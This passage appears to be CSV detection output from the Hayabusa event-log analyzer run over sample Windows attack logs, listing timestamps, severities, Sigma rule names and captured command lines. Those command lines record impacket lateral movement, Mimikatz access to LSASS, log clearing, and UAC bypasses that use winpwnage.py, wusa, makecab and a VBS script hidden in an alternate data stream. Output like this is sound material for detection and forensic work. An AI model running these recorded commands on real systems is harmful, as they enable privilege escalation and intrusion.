+09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe : Path: C:\Windows\System32\VSSVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp"" : Path: C:\Windows\Installer\MSI4FFD.tmp : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx -2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx -2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx -2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx -2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx -2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx -2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx -2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx -2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx -2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx -2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx -2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx -2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" : Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\perfmon.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx -2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /priv : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p 